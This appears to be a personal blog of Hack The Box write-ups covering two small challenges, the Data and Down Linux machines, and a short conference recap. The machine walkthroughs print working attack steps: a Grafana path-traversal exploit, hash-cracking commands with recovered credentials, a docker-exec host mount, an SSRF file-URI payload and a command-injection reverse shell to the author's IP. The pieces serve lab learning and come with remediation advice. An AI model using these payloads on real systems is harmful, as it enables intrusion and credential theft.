Oddly Even writeup

Challenge name: Oddly Even

Difficulty: Very Easy

Category: Coding

Challenge Scenario: The ghostly clock ticks strangely. Determine whether its chimes are even or odd to calm the restless spirits.

Link: https://app.hackthebox.com/challenges/Oddly%2520Even?tab=play_challenge

Machine IP: 154.57.164.66:31146

Navigated to the site.

Looks like a very simple coding challenge. This was my code.

# take in the number
n = int(input())
# calculate answer
if (n%2==0):
    answer = 'even'
else:
    answer = 'odd'
# print answer
print(answer)

For a second I thought I was dumb and looked at the writeup. You just have to scroll down for the flag when the code is correct.

GG

Baby BoneChewerCon writeup

Challenge name: Baby BoneChewerCon

Difficulty: Easy

Category: Web

Challenge Scenario: Due to heavy workload for the upcoming baby BoneChewerCon event, the website is under maintenance and it errors out, but the debugger is still enabled in production!! I think the devil is enticing us to go and check out the secret key.

Link: https://app.hackthebox.com/challenges/baby%2520BoneChewerCon?tab=play_challenge

Machine IP: 154.57.164.79:31408

Navigated to the site.

When I tried to register with just a ‘test’ it brought me to this.

Scrolling down I found APP_KEY with the flag.

GG

Data writeup

Box name: Data

Difficulty: Easy

OS: Linux

Overview: Data is an Easy Linux machine that involves exploiting [CVE-2021-43798](https://nvd.nist.gov/vuln/detail/CVE-2021-43798), an arbitrary file read via path traversal in Grafana. By exploiting this vulnerability, the database file for Grafana is extracted, and the hashes in the database are converted to a format readable by Hashcat. The hash is then cracked and can be used for SSH access to the target as user boris. The compromised user has the privileges to execute docker exec as root on the system, allowing the user to escalate and obtain root access by adding the privileged flag to running containers and mounting the host filesystem.

Link: https://app.hackthebox.com/machines/Data?sort_by=created_at&sort_type=desc

Machine IP: 10.129.234.47

Ran rustscan.

rustscan -a 10.129.234.47 –ulimit 5000 -b 2000 — -A -Pn

Navigated to the webserver on port 3000.

There also appears to be a verison number bottom right Grafana v8.0.0. Did some googling and it looks like it’s vulnerable to CVE-2021-43798 https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798/tree/main. Downloaded exploit.py, set the targets.txt to this webapp and ran it. It looks like it gave us a secret key and we were able to get a few interesting files.

sqlite3 grafana.db “select login,password,salt from user;”

Looks like we were able to get some user with hashes and salts. While cracking the hashes I had some issue using hashcat alone. I put the hash and salts in ghash.txt, downloaded grafana2hashcat.py then ran hashcat on them.

wget https://raw.githubusercontent.com/iamaldi/grafana2hashcat/main/grafana2hashcat.py

python3 grafana2hashcat.py ghash.txt -o hashcat_ready.txt

hashcat -m 10900 hashcat_ready.txt /usr/share/wordlists/rockyou.txt

boris:beautiful1

Tried sshing in and we got in.

Ran sudo -l for a quick win and found something interesting.

We can get in to the container with root using this:

sudo /snap/bin/docker exec -u root -it grafana /bin/sh

Then mount the host disk.

mount /dev/sda1 /mnt

And with this we can see all the files and read root.txt

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified ports 22 (SSH) and 3000 (HTTP). Browsed to port 3000 and found a Grafana login page with the version number visible in the bottom right corner as v8.0.0.

rustscan -a 10.129.234.47 –ulimit 5000 -b 2000 — -A -Pn

2 – Initial Access – Grafana path traversal file read – CVE-2021-43798 Researched Grafana 8.0.0 and found CVE-2021-43798, an unauthenticated path traversal vulnerability allowing arbitrary file read. Downloaded a public exploit, pointed it at the target, and successfully retrieved sensitive files including the Grafana SQLite database.

3 – Hash extraction and cracking Queried the extracted database to retrieve user login, password hash, and salt values. Used grafana2hashcat to convert the Grafana hash format into a Hashcat-compatible format and cracked the hash with rockyou.

sqlite3 grafana.db “select login,password,salt from user;” python3 grafana2hashcat.py ghash.txt -o hashcat_ready.txt hashcat -m 10900 hashcat_ready.txt /usr/share/wordlists/rockyou.txt

Credentials recovered: boris:beautiful1

4 – SSH access and user flag Authenticated via SSH as boris and retrieved user.txt.

5 – Privilege Escalation – Docker exec as root Ran sudo -l and found boris could run docker exec as root. Executed into the running grafana container as root then mounted the host disk inside the container, gaining access to the full host filesystem. Retrieved root.txt.

sudo /snap/bin/docker exec -u root -it grafana /bin/sh mount /dev/sda1 /mnt

Key Takeaways

1. Unauthenticated path traversal in Grafana – CVE-2021-43798 (CVSS 7.5 High) – Grafana 8.0.0 allowed unauthenticated path traversal to read arbitrary files from the server filesystem including the SQLite database containing user credentials. Grafana must be kept up to date and access must be restricted to authorised users and IP ranges.
   
2. Version number disclosed in the UI – The Grafana version was visible on the login page without authentication, allowing immediate and precise exploit selection. Version disclosure in public-facing login pages must be disabled.
   
3. Grafana database accessible via file read – The SQLite database storing all Grafana user credentials was readable through the path traversal vulnerability. Sensitive application databases must have restrictive filesystem permissions and must not be stored in locations accessible to web-facing processes beyond what is required.
   
4. Weak password crackable with rockyou – Boris’s password was in the rockyou wordlist and cracked quickly. All user accounts must use passwords that are resistant to dictionary attacks and password complexity must be enforced at the application level.
   
5. Docker exec sudo rule enabling container escape – Boris could run docker exec as root with no restrictions, allowing entry into a privileged container and mounting of the host filesystem. Docker exec sudo rules are effectively equivalent to unrestricted root access and must never be granted to standard users.
   

Remediation

[Immediate] Patch Grafana to remediate CVE-2021-43798 (CVSS 7.5 High) Update Grafana to the latest patched version immediately. This vulnerability has been patched since late 2021 and its presence indicates patch management has not been applied. Restrict Grafana access to authorised IP ranges and place it behind a VPN or authenticated reverse proxy. Disable version disclosure on the login page.

[Immediate] Rotate all credentials extracted from the Grafana database The boris account credentials and any other hashes recovered from the database must be considered fully compromised. Rotate all affected passwords immediately. Audit the Grafana instance for any data source credentials or API keys that may also have been exposed through the file read.

[Immediate] Remove the docker exec sudo rule Delete the sudoers entry allowing boris to run docker exec as root immediately. Unrestricted docker exec as root is functionally equivalent to full root access and must never be granted to standard users. If container management access is operationally required, implement it through a controlled and audited privileged access management solution.

[Short-term] Enforce a strong password policy Boris’s password was in the rockyou wordlist. Enforce a minimum password length of 14 characters with complexity requirements for all application and OS accounts. Audit existing passwords against common wordlists and force resets where weak passwords are found.

[Short-term] Harden Docker and container runtime security Audit all sudo rules referencing Docker commands across all hosts. Implement container runtime security controls preventing host filesystem mounts from within containers unless explicitly required. Apply the principle of least privilege to all container configurations and restrict which users can interact with the Docker daemon.

[Long-term] Implement a monitoring and internal tool patch management programme Grafana and similar internal monitoring tools are frequently overlooked in patch cycles despite running with access to sensitive credentials and data sources. Include all internal tooling in regular vulnerability scans and establish patch SLAs covering monitoring platforms, dashboards, and observability stacks.

Down writeup

Box name: Down

Difficulty: Easy

OS: Linux

Overview: Down is an easy-rated Linux machine that involves exploiting an arbitrary file read by bypassing a protocol-based filter to discover the source code of the running PHP web app, eventually, a remote code execution to gain an initial foothold. The attacker finds a readable pswm encrypted file in the user’s home directory. The pwsm uses Python’s cryptocode module and a master password to encrypt and decrypt the data. The attacker is supposed to write a small script to decrypt the blob and compromise the user. The compromised user is a member of the sudo group, allowing the user to escalate and obtain root access.

Link: https://app.hackthebox.com/machines/Down?sort_by=created_at&sort_type=desc

Machine IP: 10.129.234.87

Ran rustscan.

Checked out the http server. It looks like a site similar to down detector.

Nothing interesting in sourcecode or robots.txt. Checked exploits for Apache 2.4.52 and ran feroxbuster.

feroxbuster -u http://10.129.234.87 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

While thats running I want to check how this site is functioning. If I set up a netcat listener on 80 and have put in my IP, it looks like it’s just curling to test if the site is up.

As it’s using curl we can make it fetch the source code for us. Using Burp we can set the url variable to http://+file%3a///var/www/html/index.php, then beautify the response so the code is a bit easier to read.

It looks like there is an expertmode condition. We can check that out if we go to http://10.129.234.87/index.php?expertmode=tcp.

Right away this looks like we might be able to get a shell from this. After some testing and researching we can get a shell using:

ip=10.10.16.147&port=1337+-e+/bin/bash

Stabilized my shell.

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

And we actually got user.txt.

Originally I didn’t think there would be another user since user.txt was already given to us but there’s another user aleks.

We have access to aleks’ directory and poking around his files I eventually found /home/aleks/.local/share/pswm/pswm. When I read that it looks like some sort of hashes.

After researching pswm, that checks out as its a Python password manager https://github.com/Julynx/pswm. I couldn’t find any other credentials to decrypt these but I found a tool online https://github.com/seriotonctf/pswm-decryptor. Copied the output of the file on my machine in pswmhash.txt. Downloaded pswm-decrypt.py. Installed the requirements.

pip3 install cryptocode prettytable –break-system-packages

And ran rockyou against it.

python3 pswm-decrypt.py -f pswmhash.txt -w /usr/share/wordlists/rockyou.txt

aleks:1uY3w22uc-Wr{xNHR~+E

SShed into the device as aleks successfully.

Ran sudo -l for an easy win and we actually got it. We can run sudo all so I just switched over to root and got the flag.

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified ports 22 (SSH) and 80 (HTTP). Browsed to the web server and found a site similar to Down Detector for checking if URLs are online. Nothing interesting in source code or robots.txt. Researched Apache 2.4.52 for exploits and ran feroxbuster while poking around manually.

feroxbuster -u http://10.129.234.87 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

2 – Arbitrary file read via SSRF filter bypass Tested the site’s URL checking functionality by pointing it at a local netcat listener and confirmed the backend was using curl to fetch the target URL. Used Burp to modify the url parameter to a file URI, bypassing the HTTP-only intent and reading the PHP source code directly from the server filesystem.

url=http://+file%3a///var/www/html/index.php

3 – Initial Access – expertmode RCE Source code review revealed a hidden expertmode parameter enabling a TCP connection mode. Navigated to the expertmode endpoint and tested input handling. Confirmed command injection was possible through the port parameter. Passed a bash reverse shell payload and caught a shell as www-data. Retrieved user.txt directly from the landing directory.

http://10.129.234.87/index.php?expertmode=tcp ip=10.10.16.147&port=1337+-e+/bin/bash

4 – Lateral movement – pswm password manager decryption Discovered a second user aleks on the machine. Found a pswm encrypted password manager file at /home/aleks/.local/share/pswm/pswm. Researched pswm and found it uses Python’s cryptocode module with a master password. Copied the file to the attack machine and used a pswm brute-force decryptor tool with rockyou to recover the master password and decrypt the stored credentials.

pip3 install cryptocode prettytable –break-system-packages python3 pswm-decrypt.py -f pswmhash.txt -w /usr/share/wordlists/rockyou.txt

Credentials recovered: aleks:1uY3w22uc-Wr{xNHR~+E

5 – Privilege Escalation – sudo all SSH’d in as aleks and ran sudo -l. Found aleks had unrestricted sudo access. Switched to root and retrieved root.txt.

Key Takeaways

1. SSRF enabling arbitrary file read via file URI – The URL checking functionality passed user-supplied input directly to curl with no protocol restriction, allowing a file:// URI to read arbitrary files from the server filesystem including the PHP source code. User-supplied URLs must be validated against a strict allowlist of permitted protocols and destinations.
   
2. Hidden expertmode parameter enabling command injection – A hidden GET parameter exposed a TCP connection mode that passed user input unsanitised to a system command, allowing arbitrary code execution. All application parameters must be documented, authenticated, and subject to input validation regardless of whether they are visible in the UI.
   
3. Sensitive password manager file readable by other users – The pswm encrypted file in aleks’ home directory was readable by the www-data user, allowing it to be copied off the system and brute-forced offline. Home directory files must have restrictive permissions and sensitive files must be accessible only by the owning user.
   
4. Password manager master password in rockyou wordlist – The master password protecting all of aleks’ stored credentials was crackable with rockyou. A password manager master password is the single point of failure for all stored credentials and must be a long, randomly generated passphrase not present in any wordlist.
   
5. Unrestricted sudo access for a standard user – Aleks had full sudo access with no restrictions, meaning any compromise of this account leads directly to root. Sudo must be configured with the principle of least privilege and unrestricted sudo should never be assigned to standard user accounts.
   

Remediation

[Immediate] Remediate SSRF and restrict permitted URL protocols Validate all user-supplied URLs against a strict allowlist permitting only http and https to approved external destinations. Block file://, gopher://, dict://, and all other non-HTTP protocols at the application level. Implement a server-side request forgery protection library and consider proxying all outbound requests through a controlled egress point.

[Immediate] Remove or restrict the expertmode parameter Audit all application parameters including hidden and undocumented ones and remove any that are not required. The expertmode TCP functionality must be disabled or placed behind strong authentication. Apply strict input validation and sanitisation to all parameters that interact with system commands, blocking shell metacharacters and injection payloads.

[Immediate] Restrict sudo privileges for aleks Remove the unrestricted sudo entry for aleks immediately. If elevated access is operationally required, define explicit sudo rules limited to the specific commands needed. Audit all user sudo configurations across the system and remove any entries granting unrestricted access.

[Short-term] Enforce strict home directory and file permissions Set home directories to mode 700 so they are not readable by other users. Audit all files in user home directories for world or group readable permissions and correct them. Sensitive application data files such as password manager stores must be readable only by the owning user.

[Short-term] Enforce a strong master password policy for password managers The pswm master password must be a randomly generated passphrase of at least 20 characters not derived from any dictionary word. Educate users that the master password is the single point of failure for all stored credentials and must be treated with the highest level of protection. Consider replacing pswm with a more enterprise-grade secrets management solution.

[Long-term] Implement source code review and security testing for all web applications The SSRF and command injection vulnerabilities in this application would be identified by a basic web application security assessment. Integrate SAST tooling into the development process to catch file URI handling, unsanitised user input, and hidden parameter issues before deployment. Conduct regular penetration tests covering all application endpoints including undocumented ones.

Went to my first cybersecurity conference this weekend, BSides South Jersey, with a few friends and honestly didn’t know what to expect going in. Ended up sitting through a bunch of really interesting talks, and got a bunch of cool free merch (especially from HackTheBox). Highlight of the day, we jumped into the CTF by Cyber Skyline and I managed to pull off 3rd place. Definitely wasn’t expecting that, but I’ll take it.

Overall just a really solid experience and excited to check out more in the future.